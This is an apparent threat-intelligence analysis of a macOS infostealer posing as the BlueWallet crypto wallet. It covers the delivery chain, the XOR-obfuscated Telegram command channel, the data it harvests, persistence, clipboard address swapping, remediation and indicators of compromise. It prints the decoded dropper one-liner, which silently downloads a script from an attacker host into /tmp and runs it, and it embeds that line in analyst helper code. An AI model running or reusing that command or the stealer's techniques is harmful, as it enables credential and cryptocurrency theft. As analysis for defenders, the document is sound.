The macOS threat landscape has witnessed a significant paradigm shift. As Apple hardens its Unix-based operating system with increasingly restrictive application security barriers, threat actors are aggressively pivoting from low-level binary exploitation to sophisticated behavioral and social engineering exploitation. A clear manifestation of this trend is a highly targeted infostealer campaign masquerading as the legitimate cryptocurrency wallet application, BlueWallet. Rather than exploiting zero-day security vulnerabilities within the core operating system or breaking into the authentic codebase of the wallet, cybercriminals have weaponized branding and native system administration tools to trick users into deploying a wide-ranging, multichain infostealer.
Initial Access Vector: Circumventing Gatekeeper via AppleScript Execution
The execution chain begins on a malicious domain, update-bluewallet[.]com, engineered to closely mirror the official BlueWallet infrastructure (bluewallet[.]io). To catch visitors off guard, the attacker embeds a time-based download routine directly into the page’s document object model (DOM). The script starts a two-second loop once the page has loaded and then triggers a download of a file named BlueWallet Installer.applescript. The same download function is also bound to the primary interactive buttons on the page, so the initial stage is delivered regardless of what the user clicks.
What makes this campaign highly effective is the strategic choice of the .applescript extension. When an untrusted, unsigned application binary (.app or .pkg) is downloaded from an untrusted web source, modern macOS systems flag the file with a quarantine attribute, running it through rigorous Gatekeeper verification and developer notarization checks. However, a raw text-based AppleScript file does not register as a standard application binary. Instead, the compromised landing page presents a dynamic tutorial that instructs the victim to open the file using the native macOS Script Editor utility.
By guiding the user to run the payload inside an explicitly trusted, Apple-signed developer tool via the graphical “Play” button, the attacker sidesteps the application verification workflow entirely. The user is manually instructing an authenticated Apple tool to execute arbitrary code, so no notarization gate is ever tripped.
Stage-One Dropper Analysis: De-obfuscating the Base64 Shell Trigger
The initial file, BlueWallet Installer.applescript, contains decorative comments carefully crafted to simulate an authentic configuration utility. The metadata within the script asserts a fake version hierarchy and includes deceptive strings referencing a legitimate package manager routine, reading "Brew Install Upgrade". Beneath this administrative facade lies an extremely concise, high-impact script designed to run an encoded system terminal shell sequence and immediately close the editor interface to wipe traces from the user’s active screen.
The payload runs a single-line, base64-encoded shell command wrapped in a native do shell script block. Decoding the base64 string yields the following instruction sequence:
curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &
From an incident response standpoint, this one-liner shows classic staged dropper behavior. curl runs with the silent flag (-s), making an outbound connection to the attacker-controlled host projects2026box[.]com to fetch the true stage-two script. It saves the file to the hidden, volatile path /tmp/.sysupd.sh, a name chosen to masquerade as an internal system update process. The script then sets execute permission with chmod +x and launches the payload in the background, redirecting standard output and standard error (>/dev/null 2>&1 &) to silence any local noise.
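As an added analyst aid (not code from the page, the campaign, or BlueWallet), the following Python helper decodes the base64 blob inside a stage-one dropper's do shell script block and pulls out the remote URL, the /tmp artifacts and the dropper behaviours described above. The page does not reproduce the original AppleScript, so the constructed sample's wrapper form (echo ... | base64 -d | sh), its comment line and its quit line are assumptions; the decoded command is the one quoted above, with the domain kept defanged.

```python
import base64
import re

# Constructed stand-in for "BlueWallet Installer.applescript". The page does not reproduce the
# original wrapper, so the "echo <b64> | base64 -d | sh" form, the comment and the quit line are
# assumptions; the decoded command is the one the page quotes, with the domain kept defanged.
STAGE_ONE_COMMAND = (
    "curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' "
    "-o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &"
)
SAMPLE_DROPPER = (
    "-- Brew Install Upgrade\n"
    'do shell script "echo ' + base64.b64encode(STAGE_ONE_COMMAND.encode()).decode()
    + ' | base64 -d | sh"\n'
    'tell application "Script Editor" to quit\n'
)

BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL = re.compile(r"https?://[^\s'\"]+")
TMP_PATH = re.compile(r"/tmp/\.?[\w.-]+")


def decode_shell_stage(applescript_text):
    """Return every base64 blob found inside do shell script "..." blocks, decoded to text."""
    decoded = []
    for block in re.findall(r'do shell script "([^"]*)"', applescript_text):
        for token in BASE64_TOKEN.findall(block):
            try:
                decoded.append(base64.b64decode(token, validate=True).decode("utf-8", "replace"))
            except ValueError:  # long identifier that merely looks like base64
                continue
    return decoded


def triage(applescript_text):
    """Summarise the decoded stage: remote URLs, /tmp artifacts and classic dropper behaviours."""
    commands = decode_shell_stage(applescript_text)
    joined = "\n".join(commands)
    behaviours = []
    if re.search(r"\bcurl\s+-\w*s\w*\b", joined):      # -s: silent download
        behaviours.append("silent download")
    if "chmod +x" in joined:                             # payload made executable
        behaviours.append("marks payload executable")
    if re.search(r">/dev/null\s+2>&1\s+&", joined):      # muted, backgrounded run
        behaviours.append("detached, silenced execution")
    return {
        "commands": commands,
        "urls": sorted(set(URL.findall(joined))),
        "tmp_paths": sorted(set(TMP_PATH.findall(joined))),
        "behaviours": behaviours,
    }
```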
Stage-Two Payload Architecture: XOR De-obfuscation and C2 Infrastructure
The moment /tmp/.sysupd.sh starts executing, it establishes a tightly permissioned workspace for its operations. It sets umask 077, ensuring that any directory or file created during the harvesting cycle is readable and writable only by the compromised user. The malware then creates a hidden, randomly named staging directory under /tmp, drawing the random name from the kernel random number generator /dev/urandom.
To hide operational metadata from static string analysis, the shell script implements a basic string obfuscation wrapper, the _xd routine. This function takes a raw hexadecimal sequence, iterates across it two characters (one byte) at a time, and XORs each byte against a hardcoded repeating key: swckR9JCD2Uu.
While this algorithm is structurally weak and entirely reversible since both the processing function and the key reside exposed in the script layout, it is highly successful at slipping past simple heuristic scanners looking for raw plaintext strings. Decoding this routine unmasks the complete interactive backend profile of the implant, including:
- The primary Telegram Bot API Token
- The specific Chat Identifier tracking the operator’s drop zone
- An auxiliary secondary command token
- The target deployment staging URLs
Architecturally, the threat actor uses the same Telegram bot and chat for both outbound data exfiltration and inbound remote-control instructions. This lets the malware piggyback on legitimate, TLS-encrypted traffic that passes traditional ingress/egress filtering unchallenged. Not every component goes through the obfuscation routine, however: the public cryptocurrency addresses used by the clipboard interception loop remain declared as plain text lines within the script.
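An analyst-side reimplementation of the _xd routine, added here as an example and not taken from the sample itself: it reverses the hex-plus-repeating-XOR wrapper with the key quoted above and recovers the backend profile (token, chat id, staging URL) from a constructed stage-two fragment. The VAR=$(_xd "<hex>") call form and every value in the fragment are assumptions and placeholders, not the real token, chat identifier or URLs.

```python
import re

XD_KEY = b"swckR9JCD2Uu"  # repeating key quoted on the page


def xd_decode(hex_blob, key=XD_KEY):
    """Reverse the _xd helper: two hex chars per byte, XOR each byte with key[i % len(key)]."""
    data = bytes.fromhex(hex_blob)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).decode("utf-8", "replace")


def xd_encode(plaintext, key=XD_KEY):
    """Forward direction, used here only to build constructed fixtures (XOR is self-inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(plaintext.encode())).hex()


# How the script invokes the helper (VAR=$(_xd "<hex>")) is an assumption; the page describes
# the routine itself, not its call sites.
XD_CALL = re.compile(r'^\s*(\w+)=\$\(_xd\s+"?([0-9a-fA-F]+)"?\)', re.MULTILINE)


def recover_config(script_text, key=XD_KEY):
    """Decode every _xd-wrapped assignment in a stage-two script into a {name: value} map."""
    return {name: xd_decode(blob, key) for name, blob in XD_CALL.findall(script_text)}


# Constructed stage-two fragment with placeholder values (not the real token, chat id or URL).
SAMPLE_STAGE_TWO = "\n".join([
    "#!/bin/bash",
    "umask 077",
    'TG_TOKEN=$(_xd "%s")' % xd_encode("000000000:PLACEHOLDER_BOT_TOKEN"),
    'TG_CHAT=$(_xd "%s")' % xd_encode("-1000000000000"),
    'STAGE_URL=$(_xd "%s")' % xd_encode("https://example.invalid/stage"),
    "BTC_ADDR=bc1qPLACEHOLDERADDRESS",  # clipboard-swap targets stay in the clear, as on the page
])
```

Pointing recover_config at the real stage-two script (after extracting it from a forensic image) yields the same map, which is the quickest route to the bot token and chat id that need to be reported and blocked.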
The Data Harvesting Matrix: Target Repositories
The underlying architecture of the stage-two script features an expansive collection engine designed to systematically parse, package, and harvest highly sensitive data across six core system repositories:
1. Web Browsers
The collection loop iterates over local application state directories to extract active session cookies, saved logins, history databases, and bookmarks from an extensive list of browsers and forks:
- Chromium Ecosystem: Google Chrome (Stable, Beta, Canary, and Dev releases), Brave, Microsoft Edge, Vivaldi, Opera, Opera GX, Arc, Chromium, Coccoc, and Yandex.
- Gecko/Firefox Ecosystem: Firefox, Waterfox, Pale Moon, Zen, and LibreWolf.
- Native Ecosystem: Apple Safari’s configuration directories, cookie store, history state, and form autofill values.
2. Desktop Cryptocurrency Applications
Reflecting its focus on digital assets, the script conducts target sweeps across the default local storage directories for standard desktop wallet implementations, explicitly copying files related to:
- Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, and Tonkeeper.
3. Browser Extension Crypto Wallets
The malware runs localized profile parsing loops across the extension store paths of all discovered web browsers, zeroing in on the local secure storage vaults of the following extension configurations:
- Bitcoin Ecosystem: Xverse, Leather, UniSat, Alby, and Wizz.
- Solana Ecosystem: Phantom, Solflare, Backpack, Nightly, MagicEden, Sollet, and Slope.
- EVM Ecosystem: MetaMask, Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin, and XDEFI.
- Cosmos Ecosystem: Keplr, Station, and Cosmostation.
- Alternative/Multi-Chain Systems: Yoroi, Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos, and Temple.
4. Password Managers and Multi-Factor Authentication
The harvesting loop systematically accesses local storage and settings profiles belonging to primary identity management suites, including:
- LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, and Buttercup.
- Concurrently, the engine targets data directories linked to 2FA and time-based token generating configurations, searching for secrets tied to Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, and FreeOTP.
5. Developer Configurations and Local Credential Vaults
To compromise high-privilege technical targets, the script scans the user’s home directory (~) for high-value deployment credentials and authentication keys:
- Cloud provider credentials inside the AWS CLI (.aws) configuration.
- Local SSH keys and known_hosts files inside .ssh.
- GnuPG keystores located within .gnupg.
- Kubernetes cluster configurations within .kube.
- Shell profiles, command-history files and Git configuration (.zshrc, .zsh_history, .bash_history, .gitconfig).
6. Productivity Environments and Local File Systems
The script copies the Apple Notes SQLite database, NoteStore.sqlite, so that its plaintext note bodies can be parsed offline. It also scrapes storage linked to web productivity extensions (Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, and Google Keep).
Finally, it initiates a recursive filesystem walk across the user’s Desktop, Documents, and Downloads profiles, target-collecting any file falling below an internal size cap that matches high-yield file extensions: .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, and .env.
Post-Exploitation Tactics: Credential Phishing, Persistence, and Dynamic Clipboard Interception
Once local data aggregation completes, the malware initiates a local credential phishing routine. It spawns an osascript dialog box titled "System Preferences", prompting the user to re-enter their account password “to continue”. To avoid logging junk input, the script validates each entry against the native Directory Service command-line tool with dscl . authonly. The dialog loops indefinitely, blocking the user until a password that authenticates successfully has been captured and logged.
To package the mass of data for outbound delivery, the script avoids installing third-party utilities and instead relies on the built-in macOS ditto tool. Because ditto natively preserves resource forks and HFS+ metadata, it is a reliable packing tool for exfiltration. Since the Telegram Bot API enforces a hard 50 MB upload ceiling, the script passes the archive through the system split utility, fragmenting the stolen data into 49 MB segments before transmitting them sequentially.
Persistence is achieved by writing a custom property list (plist) into the user’s LaunchAgents path (~/Library/LaunchAgents). Pointing at a hidden Application Support path, this plist is loaded into launchd with launchctl, so the malware restarts automatically at each subsequent login.
[System Clipboard Active] ──> [clip_watch Regex Match] ──> [pbcopy Overwrite with Attacker Wallet]
Simultaneously, a persistent background monitoring function named clip_watch constantly polls the macOS system clipboard. It screens text data for strings matching Bitcoin, Ethereum, or Solana wallet address regex patterns. If a match occurs, the script forwards the legitimate target address to the command channel and immediately hijacks the paste by using the native pbcopy utility to overwrite the user’s clipboard buffer with the attacker’s public wallet address.
Finally, the implant maintains an interactive polling function called c2_loop that continuously checks the Telegram bot interface for live, operator-issued commands. This framework provides remote attackers with a comprehensive interactive operational environment:
- /info – Generates granular hardware and system configuration reports.
- /exec – Executes arbitrary terminal commands natively.
- /clipboard – Exfiltrates the current text contents of the clipboard.
- /download – Pulls specified files off the local system.
- /exfil – Forces an on-demand re-run of the data-harvesting core module.
- /selfdestruct – Purges all LaunchAgent entries, temporary workspaces, and hidden footprints to leave minimal traces for forensic investigators.
Incident Response and Remediation Protocols
If an asset has executed the malicious AppleScript payload, the host must immediately be handled as an untrusted, high-severity compromise. The following defensive operations should be performed sequentially:
- Network Isolation: Instantly disconnect the physical network link or terminate wireless connectivity to disrupt active remote control loops and stop ongoing data exfiltration chunks.
- Persistence Removal: Audit the local LaunchAgents directory (~/Library/LaunchAgents) to locate and remove any untrusted plist files. Inspect and clear the volatile staging area, removing the hidden payload script at /tmp/.sysupd.sh.
- Out-of-Band Credential Revocation: Using a completely independent, verified clean machine, systematically rotate every credential exposed during the compromise. Prioritize primary enterprise email accounts and multi-factor authenticators first, then high-value cloud endpoints, SSH hosts, and cryptocurrency exchange accounts.
- Cryptocurrency Asset Migration: Because the infostealer actively parses local extension storage and scans local files for seed words, any cryptocurrency wallet configuration present on the host must be classified as completely exposed. Create fresh wallets on a clean, hardware-isolated device and immediately move assets away from the compromised seeds.
- System Re-imaging: Given the raw terminal command execution (/exec) built into the malware’s C2 feature set, persistent kernel-level or other advanced modifications cannot be ruled out. The most reliable path back to operational integrity is to back up cold data documents, securely wipe the storage drive, and perform a completely clean reinstall of macOS from an authenticated recovery source.
Indicators of Compromise (IoCs)
File Artifacts (SHA-256)
216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 – BlueWallet Installer.applescript
Network Hostnames
update-bluewallet[.]com – Initial phishing vector and malicious dropper landing site
projects2026box[.]com – Stage-two payload delivery host
Hardcoded Attacker Cryptocurrency Addresses
- Bitcoin (BTC): bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
- Ethereum (ETH): 0x2B871703122064e45d77146a6D5203da3bD192FA
- Solana (SOL): 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v
Our Opinion
The emergence of this fake BlueWallet campaign underscores a critical shift in the macOS threat landscape: security controls have become so robust that attackers are abandoning complex zero-day exploitation in favor of sophisticated behavioral manipulation. By shifting the execution vector from unsigned, compilation-heavy binaries to a trusted native tool like Script Editor via a .applescript dropper, threat actors completely neutralize the protections provided by Apple’s application notarization and Gatekeeper frameworks. This strategy effectively weaponizes the user’s administrative intent against their own machine.
Furthermore, using Telegram as a dual-channel command-and-control server showcases an ongoing trend of “living off the land” on the network, where malicious commands hide in plain sight amid legitimate, encrypted HTTPS traffic. The breadth of the malware’s exfiltration scope, which targets everything from cryptographic extension vaults to local shell histories and cloud configuration dotfiles, reveals a calculated focus on high-yield developer environments and liquid crypto assets.
Moving forward, perimeter and endpoint protection mechanisms must evolve past static signature matches for compiled apps. Security solutions must enforce behavioral analysis on user-initiated scripts and treat unexpected scripting actions with the exact same layer of isolation and scrutiny given to foreign binary payloads.
